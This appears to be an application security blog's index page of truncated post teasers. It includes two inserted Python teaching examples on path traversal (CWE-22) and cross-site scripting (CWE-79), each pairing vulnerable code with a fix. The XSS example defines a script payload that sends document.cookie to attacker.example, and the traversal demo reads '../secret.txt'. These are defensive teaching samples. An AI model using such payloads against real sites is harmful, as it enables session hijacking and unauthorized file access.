
CWE-22: Path Traversal Vulnerabilities
Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

CWE-22, better known as a path traversal vulnerability, covers software that builds a filesystem path from untrusted input without confining the result to the intended directory, so an attacker can read or write files outside it.

Why path traversal vulnerabilities are problematic

Path traversal lets unauthorized users access your files. Some of ...
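As an added example (not code from the original post), the weakness and its fix side by side in Python: a reader that joins untrusted input onto a base directory unchecked, and a hardened reader that canonicalises the path with os.path.realpath and verifies containment before opening. The directory layout, file names and function names are constructed for the demo; the symlink case is included because a check that only strips "../" would miss it.

```python
import os
import shutil
import tempfile
from pathlib import Path


def vulnerable_read(base_dir: str, user_path: str) -> bytes:
    """CWE-22 as it usually appears: an untrusted path segment is joined onto
    the base directory with no containment check, so '../' sequences (or an
    absolute path, which os.path.join silently prefers) walk out of base_dir."""
    full = os.path.join(base_dir, user_path)
    with open(full, "rb") as f:
        return f.read()


def is_inside(base_dir: str, candidate: str) -> bool:
    """Canonicalise both sides (collapses '..', follows symlinks) and require
    the candidate to be the base directory or something beneath it."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(candidate)
    return os.path.commonpath([base, target]) == base


def safe_read(base_dir: str, user_path: str) -> bytes:
    """Hardened reader: reject absolute input, then verify the canonical
    path is still inside base_dir before opening it."""
    if os.path.isabs(user_path):
        raise PermissionError("absolute paths are not allowed")
    full = os.path.join(base_dir, user_path)
    if not is_inside(base_dir, full):
        raise PermissionError(f"{user_path!r} escapes {base_dir!r}")
    with open(full, "rb") as f:
        return f.read()


def demo() -> dict:
    """Build a throwaway tree (constructed sample data), exercise both readers,
    and return the outcomes so they can be checked programmatically."""
    root = tempfile.mkdtemp()
    try:
        public = os.path.join(root, "public")
        os.mkdir(public)
        Path(public, "readme.txt").write_bytes(b"hello")
        secret = os.path.join(root, "secret.txt")
        Path(secret).write_bytes(b"TOP SECRET")
        # A symlink inside the served directory that points outside it.
        # A purely lexical '..' filter would let this through; realpath does not.
        os.symlink(secret, os.path.join(public, "link"))

        results = {
            "vuln_normal": vulnerable_read(public, "readme.txt"),
            "vuln_traversal": vulnerable_read(public, "../secret.txt"),
            "safe_normal": safe_read(public, "readme.txt"),
        }
        for name, p in [("safe_traversal", "../secret.txt"),
                        ("safe_symlink", "link"),
                        ("safe_absolute", secret)]:
            try:
                safe_read(public, p)
                results[name] = "allowed"
            except PermissionError:
                results[name] = "blocked"
        return results
    finally:
        shutil.rmtree(root)
```

The containment check compares canonical paths with os.path.commonpath rather than a string prefix, so a sibling directory such as public2 is not mistaken for a child of public. Note that realpath-then-open still has a small time-of-check window if the tree can change underneath you; on Linux, opening the base directory once and using os.open with dir_fd, or a chroot/namespace, closes it.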

CWE-79
CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)

Image by Markus Spiske from Pixabay.

CWE-79, better known as cross-site scripting (XSS), covers web pages that include untrusted input without neutralizing it, letting an attacker run script in other users’ browsers and hijack their interactions with the application. XSS concerns developers in most languages, including C#, Go, Java, Python, and Scala, not just JavaScript, especially if ...
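As an added example (not code from the original post), the weakness in two output contexts and the matching fix in Python: untrusted text dropped into an HTML body and into a quoted attribute, beside versions that escape with html.escape. A small html.parser-based checker shows what survives rendering the way a browser tokenizer would see it. The attacker inputs, the render functions and the attacker.example host are constructed for the demo.

```python
import html
from html.parser import HTMLParser


class _TagCollector(HTMLParser):
    """Records every start tag and its attributes, roughly the way a browser's
    tokenizer would see the fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_fragment(fragment: str) -> list:
    """Return [(tag, {attr: value}), ...] for the start tags in fragment."""
    p = _TagCollector()
    p.feed(fragment)
    p.close()
    return p.tags


def render_comment_vulnerable(comment: str) -> str:
    """CWE-79: untrusted text interpolated straight into the HTML body."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment: str) -> str:
    """Escape for the HTML text context, so '<' and '&' are shown, not parsed."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_title_vulnerable(value: str) -> str:
    """Same weakness in an attribute context: a '"' in the input closes the
    attribute and lets the attacker add an event-handler attribute."""
    return f'<a href="/item" title="{value}">link</a>'


def render_title_safe(value: str) -> str:
    """quote=True also escapes '"' and "'", which a quoted attribute needs."""
    return f'<a href="/item" title="{html.escape(value, quote=True)}">link</a>'


def script_executes(fragment: str) -> bool:
    """Would the fragment, as parsed, run attacker script? True if a <script>
    element or an on* event-handler attribute survives rendering."""
    for tag, attrs in parse_fragment(fragment):
        if tag == "script":
            return True
        if any(name.lower().startswith("on") for name in attrs):
            return True
    return False


# Constructed attacker inputs for the demo.
BODY_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
ATTR_PAYLOAD = '" onmouseover="alert(document.domain)'
```

html.escape is the right encoder for HTML text and quoted-attribute contexts only; input that lands inside a script block, a URL, or a CSS value needs the encoder for that context, which is why template engines that auto-escape per context are preferable to hand-rolled string formatting.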

CWE Top 25: 2020 v. 2021
Image by Lawrence Monk from Pixabay.

In our previous post, we mentioned that the Common Weakness Enumeration (CWE) list can be long and daunting to look at when you’re first getting started. As such, one of our recommendations is to focus on items that make up the CWE Top 25 Most ...

A Brief Introduction to CWEs
Image by Werner Moser from Pixabay.

In the upcoming weeks, we will be releasing a series of blog posts focusing on the Common Weakness Enumeration, a catalog of software weakness types. We will begin with an introduction to concepts we’ll refer to again and again in the future.

What is the CWE List?

In short, Common ...

IAST, IaC, Secrets: A Guide to App Sec Tools
Image by S. Hermann & F. Richter from Pixabay.

We covered several acronyms common in application security in a previous post: SAST, DAST, and SCA. We’ll continue our discussion on AppSec concepts today by focusing on IAST, IaC, and secrets.

Interactive application security testing (IAST)

Interactive application security testing (IAST) is a fairly involved process. The ...

The Battle Between Linters, Scanners, and Data Flow Analysis
How to balance accuracy and scan times when it comes to application security tools

Image by Gerd Altmann from Pixabay.

When it comes to security tools, you’re typically balancing two things: how long a tool takes to run versus the depth and quality of the results it returns. As you might expect, ...

Developer Education: Learning to Secure Code on Demand
Scanning your code base frequently to discover security risk early in development gives engineers more time to address issues. But security risk is a challenging issue, and most developers need more than just time.

Consider:

Over 60% of identified vulnerabilities aren’t fixed.
It takes about three months to address an identified vulnerability.

These facts mean that ...

SAST vs. DAST vs. SCA: A Comparison
Photo by Lukas from Pexels.

There are many application security testing (AST) tools on the market. To describe them, we have several acronyms, including SAST, DAST, and SCA. But what do they mean?

In this post, we’ll cover the similarities and differences between SAST, DAST, and SCA so that you can make an informed decision as to ...

Static Analysis of Python Applications
We are pleased to announce that we have updated NG SAST to use the CPG deep analyzer for the analysis of Python applications!

Python applications and the vulnerabilities they contain

As of 2020, Python was the third most popular programming language in use. Python was originally released in 1991, and since then, Python’s ...

AppSec Tips for Vue.js Users
Vue.js is a popular open-source JavaScript framework for building single-page applications and user interfaces. If you’re leveraging this lightweight framework for your apps, here are some security tips to keep in mind during and after development.

Follow Vue.js’ official recommendations

We would be remiss if we didn’t point out that the Vue.js ...